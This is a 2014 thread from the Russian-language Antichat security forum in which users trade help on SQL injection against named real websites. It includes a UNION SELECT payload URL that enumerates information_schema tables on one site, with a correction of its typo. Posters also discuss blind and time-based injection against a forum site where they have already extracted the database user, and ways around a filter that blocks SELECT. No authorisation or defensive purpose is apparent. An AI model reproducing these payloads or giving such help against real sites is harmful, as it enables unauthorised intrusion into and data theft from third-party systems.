HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23701  
Старый 07.08.2014, 21:30
Unknown
Guest
Сообщений: n/a
Провел на форуме:
12774

Репутация: 12
По умолчанию

а вот еще вопросик. Чего он не показывает мне таблички?

Можно конечно через хавидж посмотреть че там есть внтури, но я учусь ручками все делать, хотелось бы получить маленькую подсказку, чтоб ковырять дальше

Код:
Code:
http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12+from+information_shema.tables+--+
 
Ответить с цитированием

  #23702  
Старый 07.08.2014, 21:32
Ravenous
Guest
Сообщений: n/a
Провел на форуме:
44130

Репутация: 26
По умолчанию

Цитата:
Сообщение от Shade  
Shade said:
а вот еще вопросик. Чего он не показывает мне таблички?
Можно конечно через хавидж посмотреть че там есть внтури, но я учусь ручками все делать, хотелось бы получить маленькую подсказку, чтоб ковырять дальше
Код:
Code:
http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12+from+information_shema.tables+--+
Найди отличия

Цитата:
Сообщение от None  
http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 +from+information_schema.tables+--
 
Ответить с цитированием

  #23703  
Старый 07.08.2014, 21:34
Unknown
Guest
Сообщений: n/a
Провел на форуме:
12774

Репутация: 12
По умолчанию

Цитата:
Сообщение от Ravenous  
Ravenous said:
Найди отличия
о мой бог) я безграммотный чудила.. благодарю
 
Ответить с цитированием

  #23704  
Старый 09.08.2014, 00:31
Unknown
Guest
Сообщений: n/a
Провел на форуме:
12774

Репутация: 12
По умолчанию

Ребят, а что скажи вот по этому поводу??? Никакой информации выбить не смог.. если хоть что-то получится, объясните как=)

Код:
Code:
http://www.sochi-news.ru/node/9123?size=thumbnail'
вроде не слеп. SQL, но и не обычная.. люди по опытнее подскажите=)
 
Ответить с цитированием

  #23705  
Старый 09.08.2014, 00:36
Ravenous
Guest
Сообщений: n/a
Провел на форуме:
44130

Репутация: 26
По умолчанию

Цитата:
Сообщение от Shade  
Shade said:
Ребят, а что скажи вот по этому поводу??? Никакой информации выбить не смог.. если хоть что-то получится, объясните как=)
Код:
Code:
http://www.sochi-news.ru/node/9123?size=thumbnail'
вроде не слеп. SQL, но и не обычная.. люди по опытнее подскажите=)
Тут и подавно не пахнет никакой инъекцией.

И вообще это Drupal) Можешь проходить мимо)
 
Ответить с цитированием

  #23706  
Старый 10.08.2014, 18:44
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.babyplan.ru/index.php?app=forums&module=post&section=post&do=r eply_post&t=31212&f=7

Мысли-идеи ? =)
 
Ответить с цитированием

  #23707  
Старый 10.08.2014, 19:21
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от Cennarios  
Cennarios said:
http://www.babyplan.ru/index.php?app=forums&module=post&section=post&do=r eply_post&t=31212&f=7
Мысли-идеи ? =)
babyplan@internal-www

Вот тут-то точно по учебнику. Слепая, временнАя и union в двадцать колонок без вывода(?). Впрочем, если сделать регу, то, возможно, вывод таки будет.

403 при выполненном запросе, 500 при ошибочном.
 
Ответить с цитированием

  #23708  
Старый 10.08.2014, 19:27
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Необходима схема получения данных, да - user() удается получить но при попытке что то достать из information_schema уже не проходит. Необходимо думать, если бы все так было просто , сюда бы не постили подобные вопросы (аутентификация явно не влияет на поведение - проверено)
 
Ответить с цитированием

  #23709  
Старый 10.08.2014, 21:11
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от Cennarios  
Cennarios said:
Необходима схема получения данных, да - user() удается получить но при попытке что то достать из information_schema уже не проходит. Необходимо думать, если бы все так было просто , сюда бы не постили подобные вопросы (аутентификация явно не влияет на поведение - проверено)
А вы не думали, что information_schema просто недоступна для этого юзера, не?
 
Ответить с цитированием

  #23710  
Старый 11.08.2014, 01:01
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Цитата:
Сообщение от madhatter  
madhatter said:
А вы не думали, что information_schema просто недоступна для этого юзера, не?
Не будьте голословны, аргументируйте свое утверждение по поводу кодов ошибки рабочими примерами реквестов

Дело в том что запос падает на любом вхождении SELECT, наверняка как-то можно обойти
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ